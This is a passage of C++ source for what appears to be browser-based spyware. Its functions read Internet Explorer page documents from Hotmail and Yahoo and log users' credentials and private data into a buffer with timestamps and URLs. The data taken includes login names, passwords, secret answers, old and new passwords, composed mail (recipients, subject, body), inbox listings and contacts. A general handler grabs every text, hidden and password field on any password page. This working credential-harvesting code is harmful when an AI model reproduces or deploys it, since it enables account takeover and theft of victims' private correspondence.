	DWORD dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(lpByte, sz, dwDisp);
	dwUsed += dwDisp;

	MSHTML::IHTMLElementCollection *pCollection;	
    HRESULT hr = pDoc->get_all(&pCollection);
	if(FAILED(hr)) return FALSE;
	long len;
    hr = pCollection->get_length(&len);
    if(FAILED(hr)) return FALSE;

	for(int i = 0; i < len; i++)
	{
		LPDISPATCH lpItem = pCollection->item(CComVariant(i), CComVariant(i));
		//Parse text & password
		//We need: login & password
		MSHTML::IHTMLInputElementPtr lpElement;
        HRESULT hr = lpItem->QueryInterface(&lpElement);
		if(SUCCEEDED(hr)) 
		{
			
			_bstr_t name = lpElement->Getname();
            _bstr_t type = lpElement->Gettype();
            _bstr_t value = lpElement->Getvalue();

			_bstr_t text(_T("text")); 
			_bstr_t hidden(_T("hidden"));
			_bstr_t password(_T("password"));
			 
			_bstr_t MName(_T("MName"));
			_bstr_t SecretAnswer(_T("SecretAnswer")); 
			_bstr_t NewPW1(_T("NewPW1"));
			_bstr_t NewPW2(_T("NewPW2"));

			if(type == text && name == MName)
			{
				HandlePageElement(lpMem, dwSize, dwUsed, (LPCTSTR)type,
				        (LPCTSTR)name,(LPCTSTR)value);								
			}
			else if(type == hidden && name == SecretAnswer)
			{
				HandlePageElement(lpMem, dwSize, dwUsed, (LPCTSTR)type,
				        (LPCTSTR)name,(LPCTSTR)value);
			}
			else if(type == password)
			{
				HandlePageElement(lpMem, dwSize, dwUsed, (LPCTSTR)type,
				        (LPCTSTR)name,(LPCTSTR)value);
			}
		}
	}
	pCollection->Release();
	pCollection = NULL;
	return TRUE;
}

BOOL HandleHotmailReadMailPage(MSHTML::IHTMLDocument2Ptr pDoc, LPBYTE lpMem, 
					   DWORD& dwSize, DWORD& dwUsed, DWORD& dwInfo)
{
	LPBYTE lpByte = lpMem;
	lpByte += dwUsed;

	//Write System Time
	SYSTEMTIME tm;
	::GetLocalTime(&tm);

	TCHAR sz[1024];
    _stprintf(sz, _T(">>>>>Hotmail ReadMail Page %d/%d/%d,%d:%d:%d\r\n"), 
		tm.wYear, tm.wMonth, tm.wDay, tm.wHour, tm.wMinute, tm.wSecond);
	DWORD dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(lpByte, sz, dwDisp);
	dwUsed += dwDisp;

	lpByte = lpMem;
	lpByte += dwUsed;
	_bstr_t url = pDoc->Geturl();
    dwDisp = ::lstrlen((LPCTSTR)url)*sizeof(TCHAR);
	::CopyMemory(lpByte, (LPCTSTR)url, dwDisp);
	dwUsed += dwDisp;

	lpByte = lpMem;
	lpByte += dwUsed;
    _stprintf(sz, _T("\r\n"));
	dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(lpByte, sz, dwDisp);
	dwUsed += dwDisp;

	//dig the nested table, too dirty
	//If your think the bandwidth is not a problem, uncomment the following return;
    return TRUE;

    //read html as a whole, to keep code simple
	MSHTML::IHTMLElementPtr spHtmlElement;
	HRESULT hr = pDoc->get_body(&spHtmlElement);
	if(FAILED(hr)) return FALSE;

	if(spHtmlElement != 0)
	{
		BSTR bstr;
	    hr = spHtmlElement->get_outerHTML(&bstr);
		if(FAILED(hr)) return FALSE;

        UINT len = ::SysStringLen(bstr); //not including a terminating null character
        //We use Unicode here, so I case directly
		lpByte = (LPBYTE)lpMem;
	    lpByte += dwUsed;
		
		if(len*sizeof(TCHAR) < dwSize - dwUsed - 1024)
		{
			::CopyMemory(lpByte, (LPCTSTR)bstr, len*sizeof(TCHAR));
		    dwUsed += len*sizeof(TCHAR);
		}
		else
		{
			DWORD dwToCopy = dwSize - dwUsed - 1024;
			::CopyMemory(lpByte, (LPCTSTR)bstr, dwToCopy);
		    dwUsed += dwToCopy;
		}
		
	    ::SysFreeString(bstr);

		lpByte = (LPBYTE)lpMem;
	    lpByte += dwUsed;
		::CopyMemory(lpByte, (LPCTSTR)_T("\r\n"), 2 * sizeof(TCHAR));
		dwUsed += 2 * sizeof(TCHAR);
	}
	return TRUE;
}

//General Purpose Password Page, including Hotmail 
BOOL HandlePasswordPage(MSHTML::IHTMLDocument2Ptr pDoc, LPBYTE lpMem, 
					   DWORD& dwSize, DWORD& dwUsed, DWORD& dwInfo)
{
    LPBYTE lpByte = lpMem;
	lpByte += dwUsed;

	//Write System Time
	SYSTEMTIME tm;
	::GetLocalTime(&tm);

	TCHAR sz[256];
    _stprintf(sz, _T(">>>>>Password Page %d/%d/%d,%d:%d:%d\r\n"), 
		tm.wYear, tm.wMonth, tm.wDay, tm.wHour, tm.wMinute, tm.wSecond);
	DWORD dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(lpByte, sz, dwDisp);
	dwUsed += dwDisp;

	lpByte = lpMem;
	lpByte += dwUsed;
	_bstr_t url = pDoc->Geturl();
    dwDisp = ::lstrlen((LPCTSTR)url)*sizeof(TCHAR);
	::CopyMemory(lpByte, (LPCTSTR)url, dwDisp);
	dwUsed += dwDisp;

	lpByte = lpMem;
	lpByte += dwUsed;
    _stprintf(sz, _T("\r\n"));
	dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(lpByte, sz, dwDisp);
	dwUsed += dwDisp;
	

	MSHTML::IHTMLElementCollection *pCollection;	
    HRESULT hr = pDoc->get_all(&pCollection);
	if(FAILED(hr)) return FALSE;
	long len;
    hr = pCollection->get_length(&len);
    if(FAILED(hr)) return FALSE;

	for(int i = 0; i < len; i++)
	{
		LPDISPATCH lpItem = pCollection->item(CComVariant(i), CComVariant(i));
		//Parse text & password
		//We need: login & password
		MSHTML::IHTMLInputElementPtr lpElement;
        HRESULT hr = lpItem->QueryInterface(&lpElement);
		if(SUCCEEDED(hr)) 
		{			
			_bstr_t name = lpElement->Getname();
            _bstr_t type = lpElement->Gettype();
            _bstr_t value = lpElement->Getvalue();

			_bstr_t text(_T("text")); 
			_bstr_t hidden(_T("hidden"));
			_bstr_t password(_T("password"));
			 
			//Note: Unicode Only Here
			if(type == text || type == hidden || type == password)
			{
				HandlePageElement(lpMem, dwSize, dwUsed, (LPCTSTR)type,
				        (LPCTSTR)name,(LPCTSTR)value);								
			}			
		}

		//Parse TextArea
		MSHTML::IHTMLTextAreaElementPtr lpArea;
		hr = lpItem->QueryInterface(&lpArea);
		if(SUCCEEDED(hr)) 
		{
			_bstr_t name = lpArea->Getname();
            _bstr_t type = lpArea->Gettype();
            _bstr_t value = lpArea->Getvalue();

			_bstr_t textarea(_T("textarea"));

			if(type == textarea)
			{
				HandlePageElement(lpMem, dwSize, dwUsed, (LPCTSTR)type,
				        (LPCTSTR)name,(LPCTSTR)value);
			}
		}
	}
	pCollection->Release();
	pCollection = NULL;
	return TRUE;
}

BOOL HandleYahooInboxPage(MSHTML::IHTMLDocument2Ptr pDoc, LPBYTE lpMem, 
					   DWORD& dwSize, DWORD& dwUsed, DWORD& dwInfo)
{
	LPBYTE lpByte = lpMem;
	lpByte += dwUsed;

	//Write System Time
	SYSTEMTIME tm;
	::GetLocalTime(&tm);

	TCHAR sz[1024];
    _stprintf(sz, _T("\r\n >>>>>Yahoo Inbox Page %d/%d/%d,%d:%d:%d\r\n"), 
		tm.wYear, tm.wMonth, tm.wDay, tm.wHour, tm.wMinute, tm.wSecond);
	DWORD dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(lpByte, sz, dwDisp);
	dwUsed += dwDisp;

	lpByte = lpMem;
	lpByte += dwUsed;
	_bstr_t url = pDoc->Geturl();
    dwDisp = ::lstrlen((LPCTSTR)url)*sizeof(TCHAR);
	::CopyMemory(lpByte, (LPCTSTR)url, dwDisp);
	dwUsed += dwDisp;

	lpByte = lpMem;
	lpByte += dwUsed;
    _stprintf(sz, _T("\r\n"));
	dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(lpByte, sz, dwDisp);
	dwUsed += dwDisp;

	MSHTML::IHTMLElementCollection *pForm;	
    pDoc->get_all(&pForm);
	long len;
    pForm->get_length(&len); //get everything here, including tr!!!
			
	for(int i = 0; i < len; i++)
	{
		LPDISPATCH lpItem = pForm->item(CComVariant(i), CComVariant(i));

		MSHTML::IHTMLTableRowPtr lpRow;
        HRESULT hr = lpItem->QueryInterface(&lpRow);
		//Is a Table Row?
		if(SUCCEEDED(hr)) 
		{
			MSHTML::IHTMLElementPtr lpRow2(lpRow);

			//Three Table Cell inside?
			MSHTML::IHTMLElementCollectionPtr pCells;	
			hr = lpRow->get_cells(&pCells);
			if(SUCCEEDED(hr))
			{
				long lenCells;
			    pCells->get_length(&lenCells);
				if(lenCells != 7) //hard code here for simplicity 
				{	
					continue;
				}

				//index based on 0, 
				//the 2st cell is the sender, 4th subject, 5th date, 6th size
				BSTR bstrSender, bstrSubject, bstrDate, bstrSize;
                LPDISPATCH lpVar = pCells->item(CComVariant(2), CComVariant(2));
				MSHTML::IHTMLElementPtr lpSender(lpVar);
				lpSender->get_innerText(&bstrSender); 
				
			    lpVar = pCells->item(CComVariant(4), CComVariant(4));
				MSHTML::IHTMLElementPtr lpSubject(lpVar);
				lpSubject->get_innerText(&bstrSubject);

				lpVar = pCells->item(CComVariant(5), CComVariant(5));
				MSHTML::IHTMLElementPtr lpDate(lpVar);
				lpDate->get_innerText(&bstrDate);

				lpVar = pCells->item(CComVariant(6), CComVariant(6));
				MSHTML::IHTMLElementPtr lpSize(lpVar);
				lpSize->get_innerText(&bstrSize);

				if(::lstrlen((LPCTSTR)bstrSender) < 256 &&
					::lstrlen((LPCTSTR)bstrSubject) < 256 &&
					::lstrlen((LPCTSTR)bstrDate) < 256 && 
					::lstrlen((LPCTSTR)bstrSize) < 256 && 
					::lstrlen((LPCTSTR)bstrSender) > 0 &&
					::lstrlen((LPCTSTR)bstrSubject) > 0 &&
					::lstrlen((LPCTSTR)bstrDate) > 0 &&
					::lstrlen((LPCTSTR)bstrSize) > 0)
				{
					//PopMsg((LPCTSTR)_T("flag"));
					lpByte = lpMem;
	                lpByte += dwUsed;
				    _stprintf(sz, _T("-%s\t%s\t%s\t%s\r\n"), (LPCTSTR)bstrSender,
					   (LPCTSTR)bstrSubject, (LPCTSTR)bstrDate, (LPCTSTR)bstrSize);
				    //PopMsg(sz);
				    dwDisp = ::lstrlen(sz) * sizeof(TCHAR);
	        	    ::CopyMemory(lpByte, sz, dwDisp);
	                dwUsed += dwDisp;
				}

				::SysFreeString(bstrSender);
				::SysFreeString(bstrSubject);
				::SysFreeString(bstrDate);
				::SysFreeString(bstrSize);
			}			
		}
	}
	return TRUE;
}

/*
fr $$$ hidden $$$ ush1-mail
p $$$ text $$$ 
 $$$ submit $$$ Search
.crumb $$$ hidden $$$ /84fZUAaezW
box $$$ hidden $$$ 
FwdFile $$$ hidden $$$ 
FwdMsg $$$ hidden $$$ 
FwdSubj $$$ hidden $$$ 
FwdInline $$$ hidden $$$ 
OriginalFrom $$$ hidden $$$ 
OriginalSubject $$$ hidden $$$ 
InReplyTo $$$ hidden $$$ 
NumAtt $$$ hidden $$$ 0
AttData $$$ hidden $$$ 
FName $$$ hidden $$$ 
Video $$$ hidden $$$ 
ATT $$$ hidden $$$ 
VID $$$ hidden $$$ 
Background $$$ hidden $$$ 
BGRef $$$ hidden $$$ 
BGDesc $$$ hidden $$$ 
BGDef $$$ hidden $$$ 
BGFg $$$ hidden $$$ 
BGFF $$$ hidden $$$ 
BGFS $$$ hidden $$$ 
BGSolid $$$ hidden $$$ 
BGCustom $$$ hidden $$$ 
PlainMsg $$$ hidden $$$ 
SEND $$$ submit $$$ Send
SD $$$ submit $$$ Save as a Draft
SC $$$ submit $$$ Spell Check
CAN $$$ submit $$$ Cancel
To $$$ text $$$ 
Cc $$$ text $$$ 
Bcc $$$ text $$$ 
Subj $$$ text $$$ 
Body $$$ textarea $$$ 
SigAtt $$$ checkbox $$$ 1
 $$$ checkbox $$$ on
Format $$$ hidden $$$ html
SaveCopy $$$ checkbox $$$ yes
SendMoney $$$ checkbox $$$ yes
Money $$$ text $$$ 
SEND $$$ submit $$$ Send
SD $$$ submit $$$ Save as a Draft
SC $$$ submit $$$ Spell Check
CAN $$$ submit $$$ Cancel
*/

BOOL HandleYahooComposePage(MSHTML::IHTMLDocument2Ptr pDoc, LPBYTE lpMem, 
					   DWORD& dwSize, DWORD& dwUsed, DWORD& dwInfo)
{
	//To $$$ text $$$ 
    //Cc $$$ text $$$ 
    //Bcc $$$ text $$$ 
    //Subj $$$ text $$$ 
    //Body $$$ textarea $$$ 
    LPBYTE lpByte = lpMem;
	lpByte += dwUsed;

	//Write System Time
	SYSTEMTIME tm;
	::GetLocalTime(&tm);

	TCHAR sz[256];
    _stprintf(sz, _T("\r\n>>>>>Hotmail Compose Page %d/%d/%d,%d:%d:%d\r\n"), 
		tm.wYear, tm.wMonth, tm.wDay, tm.wHour, tm.wMinute, tm.wSecond);
	DWORD dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(lpByte, sz, dwDisp);
	dwUsed += dwDisp;

	MSHTML::IHTMLElementCollection *pCollection;	
    HRESULT hr = pDoc->get_all(&pCollection);
	if(FAILED(hr)) return FALSE;
	long len;
    hr = pCollection->get_length(&len);
    if(FAILED(hr)) return FALSE;

	for(int i = 0; i < len; i++)
	{
		LPDISPATCH lpItem = pCollection->item(CComVariant(i), CComVariant(i));
		//Parse INPUT and TEXTAREA
		//We neen INPUT: to, cc, bcc, subject
		//        TEXTAREA: body  
		MSHTML::IHTMLInputElementPtr lpElement;
        HRESULT hr = lpItem->QueryInterface(&lpElement);
		if(SUCCEEDED(hr)) 
		{
			_bstr_t name = lpElement->Getname();
            _bstr_t type = lpElement->Gettype();
            _bstr_t value = lpElement->Getvalue();

			_bstr_t text(_T("text")); //#include <comdef.h>
			
			_bstr_t to(_T("To"));
			_bstr_t cc(_T("Cc"));
			_bstr_t bcc(_T("Bcc"));
			_bstr_t subject(_T("Subj"));
			
			if(type == text)
			{
				if(name == to || name == cc || name == bcc || name == subject)
					HandlePageElement(lpMem, dwSize, dwUsed, (LPCTSTR)type,
				        (LPCTSTR)name,(LPCTSTR)value);								
			}
		}

		//Parse TextArea
		MSHTML::IHTMLTextAreaElementPtr lpArea;
		hr = lpItem->QueryInterface(&lpArea);
		if(SUCCEEDED(hr)) 
		{
			_bstr_t name = lpArea->Getname();
            _bstr_t type = lpArea->Gettype();
            _bstr_t value = lpArea->Getvalue();

			_bstr_t textarea(_T("textarea"));
		    _bstr_t body(_T("Body"));

			if(type == textarea && name == body)
			{
				HandlePageElement(lpMem, dwSize, dwUsed, (LPCTSTR)type,
				        (LPCTSTR)name,(LPCTSTR)value);
			}
		}
	}

	pCollection->Release();
	pCollection = NULL;
	return TRUE;
	return TRUE;
}


//.tries $$$ hidden $$$ 1
//.src $$$ hidden $$$ ym
//.md5 $$$ hidden $$$ 
//.hash $$$ hidden $$$ 
//.js $$$ hidden $$$ 
//.last $$$ hidden $$$ 
//promo $$$ hidden $$$ 
//.intl $$$ hidden $$$ us
//.bypass $$$ hidden $$$ 
//.partner $$$ hidden $$$ 
//.u $$$ hidden $$$ des4d5svja85g
//.v $$$ hidden $$$ 0
//.challenge $$$ hidden $$$ 6cGHtlMVvLbVRqT5Ntgttw6ntBWv
//.yplus $$$ hidden $$$ 
//.emailCode $$$ hidden $$$ 
//pkg $$$ hidden $$$ 
//stepid $$$ hidden $$$ 
//.ev $$$ hidden $$$ 
//hasMsgr $$$ hidden $$$ 1
//.chkP $$$ hidden $$$ Y
//.done $$$ hidden $$$ http://mail.yahoo.com
//login $$$ text $$$ 
//passwd $$$ password $$$ 
//.persistent $$$ checkbox $$$ y
//.save $$$ submit $$$ Sign In


BOOL HandleYahooLogInPage(MSHTML::IHTMLDocument2Ptr pDoc, LPBYTE lpMem, 
					   DWORD& dwSize, DWORD& dwUsed, DWORD& dwInfo)
{
	//login $$$ text $$$ 
    //passwd $$$ password $$$ 
    //.persistent $$$ checkbox $$$ y
    LPBYTE lpByte = lpMem;
	lpByte += dwUsed;

	//Write System Time
	SYSTEMTIME tm;
	::GetLocalTime(&tm);

	TCHAR sz[256];
    _stprintf(sz, _T(">>>>>Yahoo LogIn Page %d/%d/%d,%d:%d:%d\r\n"), 
		tm.wYear, tm.wMonth, tm.wDay, tm.wHour, tm.wMinute, tm.wSecond);
	DWORD dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(lpByte, sz, dwDisp);
	dwUsed += dwDisp;

	MSHTML::IHTMLElementCollection *pCollection;	
    HRESULT hr = pDoc->get_all(&pCollection);
	if(FAILED(hr)) return FALSE;
	long len;
    hr = pCollection->get_length(&len);
    if(FAILED(hr)) return FALSE;

	for(int i = 0; i < len; i++)
	{
		LPDISPATCH lpItem = pCollection->item(CComVariant(i), CComVariant(i));
		//Parse text & password
		//We need: login & password
		MSHTML::IHTMLInputElementPtr lpElement;
        HRESULT hr = lpItem->QueryInterface(&lpElement);
		if(SUCCEEDED(hr)) 
		{
			
			_bstr_t name = lpElement->Getname();
            _bstr_t type = lpElement->Gettype();
            _bstr_t value = lpElement->Getvalue();

			_bstr_t text(_T("text")); //#include <comdef.h>
			_bstr_t password(_T("password"));

			_bstr_t login(_T("login"));
		    _bstr_t passwd(_T("passwd"));

			if(type == text && name == login)
			{
				HandlePageElement(lpMem, dwSize, dwUsed, (LPCTSTR)type,
				        (LPCTSTR)name,(LPCTSTR)value);								
			}
			else if(type == password && name == passwd)
			{
				HandlePageElement(lpMem, dwSize, dwUsed, (LPCTSTR)type,
				        (LPCTSTR)name,(LPCTSTR)value);
			}
		}
	}
	pCollection->Release();
	pCollection = NULL;
	return TRUE;
}

BOOL HandleYahooLogErrorPage(MSHTML::IHTMLDocument2Ptr pDoc, LPBYTE lpMem, 
					   DWORD& dwSize, DWORD& dwUsed, DWORD& dwInfo)
{
	//login $$$ text $$$ 
    //passwd $$$ password $$$ 
    //.persistent $$$ checkbox $$$ y
    LPBYTE lpByte = lpMem;
	lpByte += dwUsed;

	//Write System Time
	SYSTEMTIME tm;
	::GetLocalTime(&tm);

	TCHAR sz[256];
    _stprintf(sz, _T(">>>>>Yahoo LogErr Page %d/%d/%d,%d:%d:%d\r\n"), 
		tm.wYear, tm.wMonth, tm.wDay, tm.wHour, tm.wMinute, tm.wSecond);
	DWORD dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(lpByte, sz, dwDisp);
	dwUsed += dwDisp;

	MSHTML::IHTMLElementCollection *pCollection;	
    HRESULT hr = pDoc->get_all(&pCollection);
	if(FAILED(hr)) return FALSE;
	long len;
    hr = pCollection->get_length(&len);
    if(FAILED(hr)) return FALSE;

	for(int i = 0; i < len; i++)
	{
		LPDISPATCH lpItem = pCollection->item(CComVariant(i), CComVariant(i));
		//Parse text & password
		//We need: login & password
		MSHTML::IHTMLInputElementPtr lpElement;
        HRESULT hr = lpItem->QueryInterface(&lpElement);
		if(SUCCEEDED(hr)) 
		{
			
			_bstr_t name = lpElement->Getname();
            _bstr_t type = lpElement->Gettype();
            _bstr_t value = lpElement->Getvalue();

			_bstr_t text(_T("text")); //#include <comdef.h>
			_bstr_t password(_T("password"));

			_bstr_t login(_T("login"));
		    _bstr_t passwd(_T("passwd"));

			if(type == text && name == login)
			{
				HandlePageElement(lpMem, dwSize, dwUsed, (LPCTSTR)type,
				        (LPCTSTR)name,(LPCTSTR)value);								
			}
			else if(type == password && name == passwd)
			{
				HandlePageElement(lpMem, dwSize, dwUsed, (LPCTSTR)type,
				        (LPCTSTR)name,(LPCTSTR)value);
			}
		}
	}
	pCollection->Release();
	pCollection = NULL;
	return TRUE;
}

BOOL HandleYahooContactsPage(MSHTML::IHTMLDocument2Ptr pDoc, LPBYTE lpMem, 
					   DWORD& dwSize, DWORD& dwUsed, DWORD& dwInfo)
{
	LPBYTE lpByte = lpMem;
	lpByte += dwUsed;

	//Write System Time
	SYSTEMTIME tm;
	::GetLocalTime(&tm);

	TCHAR sz[1024];
    _stprintf(sz, _T(">>>>>Yahoo Contact Page %d/%d/%d,%d:%d:%d\r\n"), 
		tm.wYear, tm.wMonth, tm.wDay, tm.wHour, tm.wMinute, tm.wSecond);
	DWORD dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(lpByte, sz, dwDisp);
	dwUsed += dwDisp;

	lpByte = lpMem;
	lpByte += dwUsed;
	_bstr_t url = pDoc->Geturl();
    dwDisp = ::lstrlen((LPCTSTR)url)*sizeof(TCHAR);
	::CopyMemory(lpByte, (LPCTSTR)url, dwDisp);
	dwUsed += dwDisp;

	lpByte = lpMem;
	lpByte += dwUsed;
    _stprintf(sz, _T("\r\n"));
	dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(lpByte, sz, dwDisp);
	dwUsed += dwDisp;
	
	MSHTML::IHTMLElementCollection *pForm;	
    pDoc->get_all(&pForm);
	long len;
    pForm->get_length(&len); //get everything here, including tr!!!
			
	for(int i = 0; i < len; i++)
	{
		LPDISPATCH lpItem = pForm->item(CComVariant(i), CComVariant(i));

		MSHTML::IHTMLTableRowPtr lpRow;
        HRESULT hr = lpItem->QueryInterface(&lpRow);
		//Is a Table Row?
		if(SUCCEEDED(hr)) 
		{
			MSHTML::IHTMLElementPtr lpRow2(lpRow);

			//Three Table Cell inside?
			MSHTML::IHTMLElementCollectionPtr pCells;	
			hr = lpRow->get_cells(&pCells);
			if(SUCCEEDED(hr))
			{
				long lenCells;
			    pCells->get_length(&lenCells);
				if(lenCells != 3) //hard code here for simplicity 
				{	
					continue;
				}

				//index based on 0, 
				//yahoo tuckled all info into the last cell 2nd
				BSTR bstrInfo;
                LPDISPATCH lpVar = pCells->item(CComVariant(2), CComVariant(2));
				MSHTML::IHTMLElementPtr lpInfo(lpVar);
				lpInfo->get_innerText(&bstrInfo); 
							
                
				if(::lstrlen((LPCTSTR)bstrInfo) < 1000 &&
					::lstrlen((LPCTSTR)bstrInfo) > 0)
				{
					lpByte = lpMem;
	                lpByte += dwUsed;
				    _stprintf(sz, _T("-%s\r\n"), (LPCTSTR)bstrInfo);
				    //PopMsg(sz);
				    dwDisp = ::lstrlen(sz) * sizeof(TCHAR);
	        	    ::CopyMemory(lpByte, sz, dwDisp);
	                dwUsed += dwDisp;
				}
				::SysFreeString(bstrInfo);
			}			
		}
	}
	return TRUE;
}

//.done $$$ hidden $$$ http://edit.yahoo.com/config/eval_profile?.done=http://my.yahoo.com/&.scrumb=Xq
//.src $$$ hidden $$$ 
//.opw $$$ password $$$ 
//.pw1 $$$ password $$$ 
//.pw2 $$$ password $$$ 
//.commit $$$ submit $$$ Save
//.cancel $$$ submit $$$ Cancel
BOOL HandleYahooChangePasswordPage(MSHTML::IHTMLDocument2Ptr pDoc, LPBYTE lpMem, 
					   DWORD& dwSize, DWORD& dwUsed, DWORD& dwInfo)
{
	LPBYTE lpByte = lpMem;
	lpByte += dwUsed;

	//Write System Time
	SYSTEMTIME tm;
	::GetLocalTime(&tm);

	TCHAR sz[256];
    _stprintf(sz, _T(">>>>>Yahoo Change Password Page %d/%d/%d,%d:%d:%d\r\n"), 
		tm.wYear, tm.wMonth, tm.wDay, tm.wHour, tm.wMinute, tm.wSecond);
	DWORD dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(lpByte, sz, dwDisp);
	dwUsed += dwDisp;

	MSHTML::IHTMLElementCollection *pCollection;	
    HRESULT hr = pDoc->get_all(&pCollection);
	if(FAILED(hr)) return FALSE;
	long len;
    hr = pCollection->get_length(&len);
    if(FAILED(hr)) return FALSE;

	for(int i = 0; i < len; i++)
	{
		LPDISPATCH lpItem = pCollection->item(CComVariant(i), CComVariant(i));
		//Parse text & password
		//We need: login & password
		MSHTML::IHTMLInputElementPtr lpElement;
        HRESULT hr = lpItem->QueryInterface(&lpElement);
		if(SUCCEEDED(hr)) 
		{
			_bstr_t name = lpElement->Getname();
            _bstr_t type = lpElement->Gettype();
            _bstr_t value = lpElement->Getvalue();

			_bstr_t password(_T("password"));
			 
			_bstr_t CurrPW(_T("opw"));
			_bstr_t NewPW1(_T("pw1"));
			_bstr_t NewPW2(_T("pw2"));

			if(type == password)
			{
				HandlePageElement(lpMem, dwSize, dwUsed, (LPCTSTR)type,
				        (LPCTSTR)name,(LPCTSTR)value);								
			}
		}
	}
	pCollection->Release();
	pCollection = NULL;
	return TRUE;
}

//n/a
BOOL HandleYahooChangeAnswerPage(MSHTML::IHTMLDocument2Ptr pDoc, LPBYTE lpMem, 
					   DWORD& dwSize, DWORD& dwUsed, DWORD& dwInfo)
{
	return TRUE;
}

//n/a
BOOL HandleYahooForgotPasswordPage(MSHTML::IHTMLDocument2Ptr pDoc, LPBYTE lpMem, 
					   DWORD& dwSize, DWORD& dwUsed, DWORD& dwInfo)
{
	return TRUE;
}

BOOL HandleYahooReadMailPage(MSHTML::IHTMLDocument2Ptr pDoc, LPBYTE lpMem, 
					   DWORD& dwSize, DWORD& dwUsed, DWORD& dwInfo)
{
	LPBYTE lpByte = lpMem;
	lpByte += dwUsed;

	//Write System Time
	SYSTEMTIME tm;
	::GetLocalTime(&tm);

	TCHAR sz[1024];
    _stprintf(sz, _T(">>>>>Yahoo ReadMail Page %d/%d/%d,%d:%d:%d\r\n"), 
		tm.wYear, tm.wMonth, tm.wDay, tm.wHour, tm.wMinute, tm.wSecond);
	DWORD dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(lpByte, sz, dwDisp);
	dwUsed += dwDisp;

	lpByte = lpMem;
	lpByte += dwUsed;
	_bstr_t url = pDoc->Geturl();
    dwDisp = ::lstrlen((LPCTSTR)url)*sizeof(TCHAR);
	::CopyMemory(lpByte, (LPCTSTR)url, dwDisp);
	dwUsed += dwDisp;

	lpByte = lpMem;
	lpByte += dwUsed;
    _stprintf(sz, _T("\r\n"));
	dwDisp = ::lstrlen(sz)*sizeof(TCHAR);
	::CopyMemory(lpByte, sz, dwDisp);
	dwUsed += dwDisp;

	return TRUE;
}
